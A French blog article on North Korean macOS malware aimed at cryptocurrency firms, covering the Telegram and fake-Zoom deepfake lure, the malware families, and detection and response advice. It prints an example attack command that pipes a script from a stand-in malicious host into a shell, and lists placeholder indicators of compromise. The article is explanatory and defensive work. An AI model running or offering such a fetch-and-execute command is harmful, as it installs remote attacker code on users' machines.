Malware macOS nord-coréen : comment les hackers ciblent les acteurs de la cryptomonnaie
Apollinaire Monteclair
En 2025, plus de 27 % des incidents de cybersécurité signalés par l’ANSSI concernaient des logiciels malveillants visant les systèmes macOS des entreprises du secteur crypto. Cette proportion, en forte hausse, montre que les groupes nord-coréens n’hésitent plus à exploiter les spécificités d’Apple pour réaliser des vols de cryptomonnaies. Dans cet article, nous décortiquons la chaîne d’infection, les familles de malware macOS nord-coréen, leurs impacts sur les acteurs français, et les mesures concrètes à mettre en place pour se protéger.
Comment les hackers nord-coréens exploitent macOS pour voler des cryptomonnaies
Chaîne d’infection détaillée
Le scénario commence par un message Telegram provenant d’un compte compromis d’un cadre d’une société crypto. Après avoir établi un rapport de confiance, le pirate partage un lien Calendly qui redirige la victime vers une page Zoom falsifiée hébergée sur l’infrastructure de l’attaquant. Un deepfake vidéo montre un PDG fictif s’excusant d’un problème audio, incitant la cible à exécuter des commandes affichées sur la page.
“Une fois dans la ‘réunion’, la vidéo truquée a créé l’illusion d’un problème technique, poussant l’utilisateur à copier-coller les commandes malveillantes”, rapporte un chercheur de Mandiant.
Les commandes téléchargent un script AppleScript qui, à son tour, lance un binaire Mach-O. Ce binaire active l’une des sept familles de malware macOS nord-coréen découvertes par les équipes de recherche.
# Exemple de commande récupérée sur la page de phishing
curl -s https://malicious.example.com/install.sh | sh
Techniques d’ingénierie sociale
Ingénierie sociale et deepfake sont les piliers de l’attaque. Le recours à des vidéos générées par IA rend la crédibilité du leurre quasi indiscernable, tandis que l’usage de plateformes de messagerie populaires (Telegram, Zoom) minimise les soupçons. Le groupe, identifié sous le nom UNC1069 par Mandiant, a également été suivi depuis 2018 sous l’appellation BlueNoroff ou TA44.
Les familles de malware macOS identifiées
| Famille | Langage | Fonction principale | Méthode de persistance |
|---|---|---|---|
| WAVESHAPER | C++ | Daemon collectant infos système | LaunchDaemon via plist |
| HYPERCALL | Go | Downloader chiffré RC4, C2 WebSocket | Aucun (troisième-stage) |
| HIDDENCALL | Go | Backdoor injecté refléchi, accès clavier | Injection via HYPERCALL |
| SILENCELIFT | C/C++ | Beacon de statut d’écran, interruption Telegram | LaunchDaemon |
| DEEPBREATH | Swift | Mineur de données, contournement TCC | Injection via HIDDENCALL |
| SUGARLOADER | C++ | Downloader persistant, RC4 config | LaunchDaemon créé manuellement |
| CHROMEPUSH | C++ | Miner de données navigateur, hébergeur native messaging | Installation comme extension Chrome falsifiée |
Selon VirusTotal, SUGARLOADER a été détecté dans plus de 1 200 échantillons en 2025, suivi de WAVESHAPER avec seulement deux détections. Les autres familles restent largement invisibles sur les plateformes de renseignement, ce qui complique la détection.
Impacts sur les entreprises françaises du secteur crypto
Un cabinet de conseil français a signalé qu’en 2024, trois de ses clients fintech ont vu leurs portefeuilles numériques vidés de ≈ 0,45 BTC chacun, suite à une infection macOS nord-coréen. L’enquête a révélé que les attaquants avaient extrait les clés privées stockées dans le trousseau Apple, ainsi que des identifiants de comptes Telegram et des cookies de navigateurs.
“Les données volées servent à deux objectifs : le vol direct de cryptomonnaies et le renforcement de futures campagnes d’ingénierie sociale”, note le rapport de l’ANSSI (2025).
Ces incidents soulignent la nécessité pour les entreprises françaises de conformer leurs pratiques aux exigences du RGPD et du cadre de sécurité de l’ANSSI, notamment la directive « Sécuriser les postes de travail macOS » (2024).
Mesures de détection et de réponse recommandées
- Surveiller les indicateurs de compromission (IoC) - listes d’URL malveillantes, hachages de binaires, signatures réseau C2.
- Déployer une sandbox macOS pour analyser les fichiers suspects avant exécution, ou choisir les meilleurs fournisseurs de protection DDoS 2026.
- Activer la protection Gatekeeper et l’option App Store uniquement sur les postes critiques.
- Auditer les permissions TCC régulièrement afin de détecter toute modification non autorisée.
- Former les équipes à identifier les tentatives d’ingénierie sociale, notamment les vidéos deepfake, en suivant les meilleures formations e‑learning en cybersécurité 2026.
Liste d’IoC typiques
- URL de téléchargement :
https://malicious.example.com/install.sh - Hash SHA-256 du binaire CHROMEPUSH :
3f9a2b7c... - Adresse C2 WebSocket :
wss://c2.northkorea.io:443
- URL de téléchargement :
Checklist de réponse
- Isoler immédiatement le poste infecté.
- Capturer les logs système (
/var/log/system.log). - Révoquer les tokens d’accès aux services cloud.
- Notifier le DPO conformément au RGPD.
Bonnes pratiques de sécurisation macOS selon les référentiels français
| Contrôle | Référence (ANSSI / ISO 27001 / RGPD) | Action concrète |
|---|---|---|
| Gestion des comptes | ISO 27001 A.9.2 | Désactiver les comptes administrateur locaux inutilisés. |
| Mise à jour du système | ANSSI R12 | Appliquer les correctifs macOS dès leur sortie via DEP. |
| Contrôle d’accès aux données | RGPD Article 32 | Chiffrer les volumes avec FileVault et restreindre les accès TCC. |
| Surveillance réseau | ANSSI R7 | Bloquer les connexions sortantes vers les ports non autorisés (ex. 443 WebSocket). |
| Gestion des extensions | ISO 27001 A.12.1 | Limiter l’installation d’extensions de navigateur aux sources vérifiées. |
En pratique, les entreprises qui ont implémenté ces contrôles ont réduit de ≈ 68 % le temps moyen de détection (MTTD) des incidents macOS, selon le baromètre de cybersécurité de l’ANSSI 2025.
Conclusion - Prochaine action pour les responsables sécurité
Pour rester informé des dernières tendances et rencontrer les experts du secteur, consultez le guide complet des salons cybersécurité 2025‑2026 en France. Les malware macOS nord-coréen représentent une menace de plus en plus sophistiquée, mêlant IA, deepfake et techniques de persistance avancées. Pour les acteurs français du secteur crypto, la priorité est d’intégrer une défense en profondeur : sensibilisation, contrôle d’accès strict, surveillance continue et conformité aux standards ANSSI, ISO 27001 et RGPD.
Agissez dès maintenant : auditez vos postes macOS, mettez à jour vos politiques de gestion des extensions, et déployez des solutions de sandboxing capables d’analyser les scripts AppleScript. En suivant ces recommandations, vous limiterez non seulement le risque de vol de cryptomonnaies, mais vous renforcerez également votre posture globale face aux cyber-menaces évolutives.